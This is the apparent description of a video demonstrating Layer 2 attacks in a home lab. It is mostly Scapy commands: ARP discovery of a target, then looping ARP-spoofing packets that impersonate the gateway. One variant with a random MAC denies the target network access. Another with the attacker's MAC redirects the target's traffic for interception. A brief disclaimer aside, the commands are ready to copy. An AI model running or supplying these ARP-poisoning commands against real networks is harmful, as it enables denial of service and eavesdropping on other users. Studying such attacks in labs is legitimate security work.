A short podcast to help anyone wishing to make a quick start in open pcap files from tcpdump or Wireshark. In the second part of the video shows how to "denial" the target PC with a random MAC address and the last part is target internet activities from your PC.
This is proof of the concept of the Layer 2 OSI Model. Viewer must responsible for your own action and apply.
Obtain MAC address (L2) of random IP address (L3)
ans,unans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.10.157"),timeout=2,iface="enp0s3")
Targeted: Centos 8
MAC: 08:00:27:81:de:65
IP : 192.168.10.157
Attacker: Fedora 30
MAC: 08:00:27:c5:71:fc
IP: 192.168.10.167
Gateway
MAC: c0:25:e9:ef:db:ac
IP: 192.168.10.7
sendp(Ether(dst="Target MAC address")/ARP(hwsrc="Spoofed source MAC address",psrc="Spoofed source IP address", pdst="Target IP address"), loop =1, inter=1,iface= "enp0s3")
Spoofed Source IP address = Default Gateways IP address
Spoofed Source MAC address = A random MAC address
Random MAC
sendp(Ether(dst="08:00:27:81:de:65")/ARP(hwsrc="00:11:22:33:44:55",psrc="192.168.10.7", pdst="192.168.10.157"), loop =1, inter=1,iface="enp0s3")
Attacker/me MAC address
sendp(Ether(dst="08:00:27:81:de:65")/ARP(hwsrc="08:00:27:c5:71:fc",psrc="192.168.10.7", pdst="192.168.10.157"), loop =1, inter=1,iface="enp0s3")